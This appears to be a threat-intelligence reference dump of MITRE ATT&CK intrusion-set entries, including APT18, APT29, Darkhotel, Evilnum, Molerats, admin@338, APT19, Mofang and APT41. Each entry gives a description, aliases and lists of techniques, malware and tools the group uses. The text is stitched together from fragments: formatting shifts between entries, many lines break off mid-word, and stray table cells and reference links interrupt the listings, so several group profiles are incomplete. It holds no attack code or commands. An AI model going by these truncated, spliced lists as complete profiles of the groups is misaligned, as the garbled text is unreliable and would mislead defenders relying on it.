[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)

The tag is: *misp-galaxy:mitre-intrusion-set="APT18 - G0026"*

APT18 - G0026 is also known as:

• APT18
• TG-0416
• Dynamite Panda
• Threat Group-0416

APT18 - G0026 has relationships with:

• similar: misp-galaxy:threat-actor="Wekby" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Samurai Panda" with estimative-language:likelihood-probability="likely"

• similar: misp-galaxy:threat-actor="Maverick Panda" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Pisloader - S0124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="hcdLoader - S0071" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 4319. Table References

Links

https://attack.mitre.org/groups/G0026
APT29 - G0016

[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia’s Foreign Intelligence Service (SVR). (Citation: White House Imposing Costs RU Gov April 2021) (Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) (Citation: Crowdstrike DNC June 2016) (Citation: UK Gov UK Exposes Russia SolarWinds April 2021)

In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes. (Citation: NSA Joint Advisory SVR SolarWinds April 2021) (Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo. (Citation: FireEye SUNBURST Backdoor December 2020) (Citation: MSTIC NOBELIUM Mar 2021) (Citation: CrowdStrike SUNSPOT Implant January 2021) (Citation: Volexity SolarWinds)

The tag is: `misp-galaxy:mitre-intrusion-set="APT29 - G0016"`

APT29 - G0016 is also known as:

- APT29
- Dark Halo
- StellarParticle
- NOBELIUM
- UNC2452
- YTTRIUM
- The Dukes
- Cozy Bear
- CozyDuke

APT29 - G0016 has relationships with:

- similar: `misp-galaxy:threat-actor="APT 29"` with estimative-language:likelihood-
probability="likely"

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="meek - S0175"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="Tor - S0183"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-malware="CozyCar - S0046"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="SDelete - S0195"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="CosmicDuke - S0050" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="MiniDuke - S0051" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="HAMMERTOSS - S0037" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="POSHSPY - S0150" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="OnionDuke - S0052" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="WellMess - S0514" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="WellMail - S0515" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="SoreFang - S0516" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="SUNSPOT - S0562" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="TEARDROP - S0560" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="Raindrop - S0565" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="GoldFinder - S0597" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="GoldMax - S0588" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SUNBURST - S0559" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1584.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exchange Email Delegate Permissions - T1098.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Cookies - T1606.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-
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<td><a href="https://attack.mitre.org/groups/G0016">https://attack.mitre.org/groups/G0016</a></td>
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<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
</tr>
</tbody>
</table>
Darkhotel - G0012

[Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020)

The tag is: *misp-galaxy:mitre-intrusion-set="Darkhotel - G0012"

Darkhotel - G0012 is also known as:

- Darkhotel
- DUBNIUM

Darkhotel - G0012 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry RunKeys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="User Activity Based Checks - T1497.002" with estimative-language:likelihood-probability="almost-certain"

Table 4321. Table References
Evilnum - G0120

[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018. (Citation: ESET EvilNum July 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Evilnum - G0120"`

Evilnum - G0120 is also known as:

- Evilnum

Evilnum - G0120 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="LaZagne - S0349"` with estimative-language:likelihood-probability="almost-certain"
probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="EVILNUM - S0568" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0120">https://attack.mitre.org/groups/G0120</a></td>
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**Molerats - G0021**

[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States. (Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)

The tag is: **misp-galaxy:mitre-intrusion-set="Molerats - G0021"**

Molerats - G0021 is also known as:

- Molerats
- Operation Molerats
- Gaza Cybergang

Molerats - G0021 has relationships with:

- similar: misp-galaxy:threat-actor="Molerats" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="DustySky - S0062" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-
• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Spark - S0543" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="DropBook - S0547" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SharpStage - S0546" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="MoleNet - S0553" with estimative-language:likelihood-probability="almost-certain"

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| Links | 2164 |
admin@338 - G0018

[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)

The tag is: `misp-galaxy:mitre-intrusion-set="admin@338 - G0018"`

admin@338 - G0018 is also known as:

- admin@338

admin@338 - G0018 has relationships with:

- similar: misp-galaxy:threat-actor="Temper Panda" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="BUBBLEWRAP - S0043" with estimative-language:likelihood-
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="LOWBALL - S0042" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0018">https://attack.mitre.org/groups/G0018</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html">https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html</a></td>
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**APT19 - G0073**

[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China’s Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="APT19 - G0073"
APT19 - G0073 is also known as:

- APT19
- Codoso
- C0d0so0
- Codoso Team
- Sunshop Group

APT19 - G0073 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/">https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/</a></td>
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**Mofang - G0103**

[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)

The tag is: `misp-galaxy:mitre-intrusion-set="Mofang - G0103"`

Mofang - G0103 is also known as:

- Mofang

Mofang - G0103 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
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<td><a href="https://attack.mitre.org/groups/G0103">https://attack.mitre.org/groups/G0103</a></td>
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<td><a href="https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf">https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf</a></td>
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</table>

**APT41 - G0096**

[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. [APT41](https://attack.mitre.org/groups/G0096) has been active since as early as 2012. The group has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries.(Citation: FireEye APT41 Aug 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="APT41 - G0096"`

APT41 - G0096 is also known as:

- APT41
- WICKED PANDA

APT41 - G0096 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Rootkit - T1014"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-
